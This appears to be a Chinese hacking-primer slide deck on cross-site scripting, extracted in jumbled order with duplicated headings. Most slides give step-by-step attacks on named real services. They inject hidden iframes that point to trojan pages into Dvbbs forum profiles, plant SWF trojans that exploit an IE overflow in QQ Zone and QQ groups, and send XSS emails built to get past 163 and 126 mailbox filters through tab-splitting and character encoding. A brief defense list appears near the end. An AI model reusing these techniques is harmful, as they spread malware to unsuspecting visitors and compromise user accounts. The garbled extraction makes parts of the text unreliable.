黑客入门之跨网站攻击技术
合集下载
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Flash溢出跨站攻击 Flash溢出跨站攻击
3.Q-Zone溢出跨站 Zone溢出跨站 打开QQ空间后,在页面中单击【自定义】按钮,在自定义工具栏中单击【模 块】选项卡,单击【新建模块】按钮,在其中选择新建一个Flash模块,在【添加 Flash模块】对话框中的“Flash动画地址”栏中输入Flash溢出木马的网址,如图 6-19所示。单击【确认】按钮,即可完成模块的添加。在提交自定义模块代码后 ,用户进入该QQ空间时会自动打开显示上传的SWF木马Flash,从而在后台下载运 行木马服务端程序。
典型的跨站攻击实例演示
具体的操作步骤如下: 步骤5:单击【更新】按钮,即可提交修改资料内容。若提交成功,即可弹出提示信 息“你的修改信息已成功提交!”,如图6-5所示。 步骤6:提交成功后返回论坛,回复或新发一篇帖子,帖子的内容可以随意填写。发 表成功后再查看新发的帖子,即可发现在新发的帖子页面中已经嵌入了一个网页 框架,在框架中显示了“新起点工作室”的页面,如图6-6所示。
邮箱跨站攻击
1 邮箱跨站的危害 2 国内主流邮箱跨站漏洞
1.Tab绕过过滤:163邮箱跨站测试 2.编码转换逃脱过滤:126邮箱的跨站测试
Tab绕过过滤:163邮箱跨站测试 Tab绕过过滤:163邮箱跨站测试 绕过过滤
对163邮箱进行跨站的操作步骤如下: 步骤1:登录163免费邮箱,在“收件人”栏中填入要攻击的邮箱地址,主题可以任意 填写,单击下方编辑窗口中的【全部功能】按钮展开全部功能项,从功能栏中单 击【编辑源码】按钮 ,进入HTML代码编写状态,在其中输入测试代码<img src=j ava script:wi ndow.op en('')>/,如图6-28所示。 步骤2:单击【发送】按钮,即可发送邮件滤特殊的字符: 过滤特殊的字符:&、回车和空格
转换代码后即可突破过滤程序,继续进行跨站攻击了。有安全意识的程序又 会继续对此漏洞进行弥补过滤,使用“replace(str,"&","&") ”代码将 “&”符替换成“&”,于是后面语句便全部变形失效了。但攻击者又可能采 用另外方式绕过过滤,因为过滤关键字方式漏洞很多。攻击者可能会构造“<img src="javascript:alert(/跨站攻击/)" width=100>”攻击代码,如图6-34所示。
黑客攻防秘技实战解析 (第2版)
跨网站攻击技术
♂典型的跨站攻击实例演示 ♂跨站攻击技术演变 ♂邮箱跨站攻击 ♂搜索引擎的跨站攻击
典型的跨站攻击实例演示
具体的操作步骤如下: 步骤1:打开动网论坛首页,如图6-1所示。先在论坛注册一个用户,单击【登录】按 钮进行登录,登录后的界面如图6-2所示。
典型的跨站攻击实例演示
Flash溢出跨站攻击 Flash溢出跨站攻击
2.在QQ群中挂马 QQ群中挂马 群中挂 在新帖页面中单击【插入Flash】按钮,在弹出对话框中输入SWF木马文件的 网络链接地址,并设置其尺寸大小,单击【插入】按钮插入Flash文件,如图6-18 所示。在发表新帖子后,当有人在QQ群中打开查看这篇帖子时,就会自动播放 Flash并在后台下载运行木马服务端了。当然,也可以直接在QQ群中散布SWF木马 文件的网址,别人单击后一样会中木马,不过这种方式不如发表帖子隐蔽的效果 好,攻击的持续性也不强。
具体的操作步骤如下: 步骤3:选择【用户控制面板】→【联系资料修改】菜单项,即可打开个人资料修改 页面,如图6-3所示。 步骤4:在“论坛密码”栏中输入论坛密码,在“主页地址”栏中输入代码 “</Script><IfRA ME height=0 width=0 sRc=”http//网页木马地址 ”></IFrAME>”。另外,还需要在“MSN号码”栏中输入代码:<Script Language=JavaScript>var actioninfo3='单帖屏蔽',如图6-4所示。
编码转换逃脱过滤:126邮箱的跨站测试 编码转换逃脱过滤:126邮箱的跨站测试
对126邮箱进行跨站的操作步骤如下: 步骤1:登录126免费邮箱,在“收件人”栏中填入要攻击的邮箱地址,主题可任意填 写,单击下方编辑窗口中的【全部功能】按钮展开全部功能项,从功能栏中单击 【编辑源码】按钮 ,即可进入HTML代码编写状态,在其中输入测试代码,如图630所示。 步骤2:在编写完成后,单击【发送】按钮发送邮件,待发送成功后,当接收者在收 到该邮件并进行查看时束,谢谢观赏
跨站脚本攻击的防御
(1)过滤“<”和“>”标记 (2)HTML标记属性过滤 (3)过滤特殊的字符:&、回车和空格 (4)HTML属性跨站的彻底防范
过滤特殊的字符: 过滤特殊的字符:&、回车和空格
其实上述过滤还是不完全的,因为HTML属性的值,可支持“&#ASCii”的形式进行表 示,如前面的跨站代码可以换成如下代码,如图6-33所示。 <img src="javascript:alert(/跨站攻击/)" width=100>
跨站攻击技术的演变
1 2 3 4 不安全的客户端过滤 编辑转换也可以跨站 Flash跳转的跨站攻击 Flash溢h溢出跨站攻击
1.制作Flash溢出木马 制作Flash溢出木马 Flash 步骤1:打开Icode To SWF工具,单击“SWF文件”后面的【选择】按钮,选择本机上 某个正常的Flash文件;在“插入代码”栏中填写刚才的网页木马的链接地址。 步骤2:单击【给我插】按钮,即可将网页木马链接插入到正常的Flash文件中了,如 图6-17所示。SWF插马工具生成的Flash文件是利用了一个IE漏洞,对方打开Flash 文件后,就会造成IE溢出,自动访问木马网页在后台下载运行网页中的木马程序 。
专家课堂(常见问题与解答) 专家课堂(常见问题与解答)
点拨1 点拨1:为什么在使用“getURL("http://www.***.com ");”语句时,没有输入后面 的分号“;”就提示语法错误? 解答: 解答:Actions acript 的每行语句都以分号“;”结束,它不同于BASIC语言, Actions cript 语句同C++、Java、Pascal一样允许分多行书写,即允许将一条很 的长语句分割成两个或更多代码行,只要在结尾有个分号就行了。 点拨2 点拨2:为什么有些代码中将一些关键字符使用一个空格分隔开了(如javascript) ? 解答: 解答:在某些代码中使用空格将部分关键字符分隔开,这些空格是使用Tab键产生的 ,是为了逃脱过滤机制,从而顺利进行攻击。